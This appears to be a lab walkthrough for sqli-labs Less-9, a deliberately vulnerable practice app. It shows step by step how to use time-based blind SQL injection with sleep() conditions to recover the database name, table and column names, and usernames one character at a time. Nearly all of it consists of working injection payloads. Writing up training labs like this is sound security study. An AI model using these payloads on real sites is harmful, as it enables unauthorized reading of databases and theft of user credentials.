sqli-labs less-9
This level is injected differently from the previous ones, but we still go through the same steps.
* Detecting the injection
First, ?id=1 returns the normal page
?id=1' returns the normal page
?id=1" returns the normal page
So this level gives no boolean signal: whether the injected statement is valid or not, the response is always You are in..., so we use time-based (delay) injection.
We need the sleep function
?id=1' and (sleep(5)) --+ takes 7 seconds
?id=1 and (sleep(5)) --+ takes 2 seconds
The 2 seconds is the baseline response time; the extra 5 seconds only appear when the single quote closes the string literal and sleep(5) actually executes (without the quote, the whole thing stays inside the quoted id value and is never evaluated). So the injection is a single-quote injection. Note that the + in --+ is URL-decoded to the space that MySQL requires after the -- comment marker.
* Querying the details
- Database name length
?id=1' and if(length(database())=8,sleep(5),1) --+
If the response takes about 7 seconds (baseline plus the 5 second sleep) the condition is true, so the database name is 8 characters long.
- Database name
?id=1' and if(substr(database(),1,1)='s',sleep(5),1) --+ (or ?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+ , 115 -> 's'; note the closing parenthesis of ascii() goes before the comparison)
?id=1' and if(substr(database(),2,1)='e',sleep(5),1) --+
?id=1' and if(substr(database(),3,1)='c',sleep(5),1) --+
?id=1' and if(substr(database(),4,1)='u',sleep(5),1) --+
?id=1' and if(substr(database(),5,1)='r',sleep(5),1) --+
?id=1' and if(substr(database(),6,1)='i',sleep(5),1) --+
?id=1' and if(substr(database(),7,1)='t',sleep(5),1) --+
?id=1' and if(substr(database(),8,1)='y',sleep(5),1) --+
So the database name is security. Comparing substr() against a quoted letter is case-insensitive under MySQL's default collation; comparing ascii() against a number is case-sensitive, which matters later for values such as usernames.
- Number of tables in the database
?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1) --+
- Table names
?id=1' and if((select table_name from information_schema.tables where table_schema='security' limit 0,1)='emails',sleep(5),1) --+
?id=1' and if((select table_name from information_schema.tables where table_schema='security' limit 1,1)='referers',sleep(5),1) --+
?id=1' and if((select table_name from information_schema.tables where table_schema='security' limit 2,1)='uagents',sleep(5),1) --+
?id=1' and if((select table_name from information_schema.tables where table_schema='security' limit 3,1)='users',sleep(5),1) --+
- Number of columns
?id=1' and if((select count(column_name) from information_schema.columns where table_name='users')=3,sleep(5),1) --+
(This counts every table named users in any schema; if another database on the server also has a users table, add table_schema='security' to the where clause.)
- Column names
?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='i',sleep(5),1) --+ (or ?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,sleep(5),1) --+ , 105 -> 'i')
?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1)='d',sleep(5),1) --+
So column one is id
In the same way (limit 1,1 and limit 2,1):
column two: username
column three: password
- Number of rows in the table
?id=1' and if((select count(username) from users)=13,sleep(5),1) --+ so the table holds 13 rows
- Length of a value
?id=1' and if(length(username)=4,sleep(5),1) --+
This works only because the injected query already runs against users, so username here is the value in the row with id=1. The general form that works from any injection point is length((select username from users limit 0,1))=4.
- Extracting the value
?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),1) --+ -> D (68 is uppercase D, which is why the ascii() comparison is used here)
?id=1' and if(ascii(substr((select username from users limit 0,1),2,1))=117,sleep(5),1) --+ -> u
?id=1' and if(ascii(substr((select username from users limit 0,1),3,1))=109,sleep(5),1) --+ -> m
?id=1' and if(ascii(substr((select username from users limit 0,1),4,1))=98,sleep(5),1) --+ -> b
So the first username is Dumb. The password column and the remaining rows are read the same way, by changing the column name and the limit offset.
Done.